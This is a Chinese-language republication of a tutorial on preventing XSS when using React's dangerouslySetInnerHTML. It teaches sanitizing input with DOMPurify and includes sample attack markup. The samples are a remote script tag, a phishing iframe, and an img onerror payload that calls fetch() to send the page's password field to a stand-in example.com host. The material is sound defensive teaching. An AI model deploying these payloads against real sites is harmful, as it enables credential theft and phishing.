使用 React 的「危險 SetInnerHTML」時緩解 XSS 漏洞-js教程-PHP中文網

首頁

web前端

js教程

使用 React 的「危險 SetInnerHTML」時緩解 XSS 漏洞

DDD

Sep 13, 2024 am 06:35 AM

Mitigate XSS exploits when using React

封面圖片由 Lautaro Andreani

...

TL: DR;盲目地將內容轉儲到危險的SetInnerHTML 中就是這樣 - 危險。確保您正在清理傳遞給危險SetInnerHTML 的任何輸入，除非您對輸入有明確控制。

以下組件作為透過危險的 SetInnerHTML 降低 XSS 攻擊風險的簡單範例：

//https://github.com/cure53/DOMPurify
import React from "react";
import DOMPurify from "dompurify";

const sanitize = (dirty) => DOMPurify.sanitize(dirty);

const DangerousHtml = ({ innerHTML, tag }) => {
  const clean = sanitize(innerHTML);

  if (typeof tag === "undefined") {
    return <div dangerouslysetinnerhtml="{{" __html: clean></div>;
  }
  return <tag dangerouslysetinnerhtml="{{" __html: clean></tag>;
};

export default DangerousHtml;

透過使用我們自訂的 DangerousHtml 元件，我們可以大幅降低 XSS 漏洞的風險，因為我們會在輸入到達實際危險的 SetInnerHTML 屬性之前對其進行清理

DOMPurify 也是高度可配置的，因此您可能想要擁有多個元件（如我們的範例）來處理特定用例或明確允許以下某些範例。

以下是一些有關漏洞如何發生的簡短範例：

利用 iFrame 和腳本標籤

XSS 是可能的，因為 React 不會刪除指向惡意負載的腳本標籤。

我們也不應該以這種方式傳遞 iFrame。相反，我們應該將 URL 和任何其他「安全性」屬性作為 props 傳遞，並在 iFrame 標記中自行渲染，以保留對其渲染能力和來源的控制，或擁有專用的 iFrame 元件。

例如，考慮我們從 API 請求收到的惡意標記。如果我們透過危險的SetInnerHTML盲目地設定它，我們將為使用者提供以下輸出：

// Bad markup going in
<div dangerouslysetinnerhtml="{{" __html:>
  Hi
  <script src="https://example.com/malicious-tracking"></script>
  Fiona, here is the link to enter your bank details:
  <iframe src="https://example.com/defo-not-the-actual-bank"></iframe>
`,
  }}
/>






<pre class="brush:php;toolbar:false"><!-- Bad markup rendered on the DOM -->
<div>
  <p>
    Hi
    <script src="https://example.com/malicious-tracking"></script>
    Fiona, here is the link to enter your bank details:
    <iframe src="https://example.com/defo-not-the-actual-bank"></iframe>
  </p>
</div>

但是，使用我們的 DangerousHTML 元件意味著我們已經減輕了使用者可能面臨的大部分風險：

// Bad markup going in
<dangeroushtml innerhtml="{`<p">
  Hi
  <script src="https://example.com/malicious-tracking"></script>
  Fiona, here is the link to enter your bank details:
  <iframe src="https://example.com/defo-not-the-actual-bank"></iframe>
`}
/>
</dangeroushtml>

<!-- Clean markup rendered on the DOM -->
<div>
  <p>Hi Fiona, here is the link to enter your bank details:</p>
</div>

Fiona 可能認為網站因某種原因損壞或丟失內容 - 但這仍然比被釣魚獲取銀行詳細資訊要好！

屬性操縱/中毒

有些 DOM 元素具有我們可以濫用的特殊屬性，我們應該保護自己免受這些屬性的侵害。

在此範例中，我們可以在上執行一些 JS標籤的 onerror。

例如，給出以下內容：

// Bad markup going in
<div dangerouslysetinnerhtml="{{" __html:>
  Hola
  <img  src="/static/imghwm/default1.png" data-src="none.png" class="lazy" onerror='fetch("https://example.com/malicious-tracking?password=" + document.querySelector("input#password").value);' alt="使用 React 的「危險 SetInnerHTML」時緩解 XSS 漏洞" >
  Sharon
`,
  }}
/>






<pre class="brush:php;toolbar:false"><!-- Bad markup rendered on the DOM -->
<div>
  <p>
    Hola
    <img  src="/static/imghwm/default1.png" data-src="none.png" class="lazy" onerror='fetch("https://example.com/malicious-tracking?password=" + document.querySelector("input#password").value);' alt="使用 React 的「危險 SetInnerHTML」時緩解 XSS 漏洞" >
    Sharon
  </p>
</div>

在這種情況下，當圖像請求最終失敗並且用戶永遠不會知道時，我們的中毒標記正在從 DOM 竊取資料。

我們可以使用 DangerousHtml 組件再次緩解這種情況

// Bad markup going in
<dangeroushtml innerhtml="{`">
  Hola
  <img  src="/static/imghwm/default1.png" data-src="none.png" class="lazy" onerror='fetch("https://example.com/malicious-tracking?password=" + document.querySelector("input#password").value);' alt="使用 React 的「危險 SetInnerHTML」時緩解 XSS 漏洞" >
  Sharon
`}
/>
</dangeroushtml>

<!-- Clean markup rendered on the DOM -->
<div>
  <p>
    Hola
    <img  src="/static/imghwm/default1.png" data-src="none.png" class="lazy" alt="使用 React 的「危險 SetInnerHTML」時緩解 XSS 漏洞" >
    Sharon
  </p>
</div>

考慮到我們可能真的想執行一些JS 來顯示後備映像，我們不應該再相信原始的、未經淨化的HTML 來為我們做這件事，並且最好使用我們需要的FallbackImageURL 或onError 屬性。可以像這樣明確地添加到我們的圖像標籤中：

// Usual imports
const MyImageComponent = ({ fallbackUrl, url }) => {
  // Usual component setup

  const displayFallbackImage = (evt) => {
    // If there is no fallback, do nothing
    if (!fallbackUrl) return;

    // set the url to the fallbackUrl
    evt.target.src = fallbackUrl;
  };

  return (
    <img  src="%7Burl%7D" onerror="{displayFallbackImage}" ... any other props alt="使用 React 的「危險 SetInnerHTML」時緩解 XSS 漏洞" >
  );
};

...

原文：https://timbryan.dev/posts/react-xss-via-dangerouslySetInnerHtml

以上是使用 React 的「危險 SetInnerHTML」時緩解 XSS 漏洞的詳細內容。更多資訊請關注PHP中文網其他相關文章！

陳述

本文內容由網友自願投稿，版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容，請聯絡admin@php.cn

在JavaScript中替換字符串字符Mar 11, 2025 am 12:07 AM

JavaScript字符串替換方法詳解及常見問題解答本文將探討兩種在JavaScript中替換字符串字符的方法：在JavaScript代碼內部替換和在網頁HTML內部替換。在JavaScript代碼內部替換字符串最直接的方法是使用replace()方法： str = str.replace("find","replace"); 該方法僅替換第一個匹配項。要替換所有匹配項，需使用正則表達式並添加全局標誌g： str = str.replace(/fi

自定義Google搜索API設置教程Mar 04, 2025 am 01:06 AM

本教程向您展示瞭如何將自定義的Google搜索API集成到您的博客或網站中，提供了比標準WordPress主題搜索功能更精緻的搜索體驗。令人驚訝的是簡單！您將能夠將搜索限制為Y

構建您自己的Ajax Web應用程序Mar 09, 2025 am 12:11 AM

因此，在這裡，您準備好了解所有稱為Ajax的東西。但是，到底是什麼？ AJAX一詞是指用於創建動態，交互式Web內容的一系列寬鬆的技術。 Ajax一詞，最初由Jesse J創造

示例顏色json文件Mar 03, 2025 am 12:35 AM

本文系列在2017年中期進行了最新信息和新示例。在此JSON示例中，我們將研究如何使用JSON格式將簡單值存儲在文件中。使用鍵值對符號，我們可以存儲任何類型的

8令人驚嘆的jQuery頁面佈局插件Mar 06, 2025 am 12:48 AM

利用輕鬆的網頁佈局：8 ESTISSEL插件jQuery大大簡化了網頁佈局。本文重點介紹了簡化該過程的八個功能強大的JQuery插件，對於手動網站創建特別有用

什麼是這個＆＃x27;在JavaScript？Mar 04, 2025 am 01:15 AM

核心要點 JavaScript 中的 this 通常指代“擁有”該方法的對象，但具體取決於函數的調用方式。沒有當前對象時，this 指代全局對象。在 Web 瀏覽器中，它由 window 表示。調用函數時，this 保持全局對象；但調用對象構造函數或其任何方法時，this 指代對象的實例。可以使用 call()、apply() 和 bind() 等方法更改 this 的上下文。這些方法使用給定的 this 值和參數調用函數。 JavaScript 是一門優秀的編程語言。幾年前，這句話可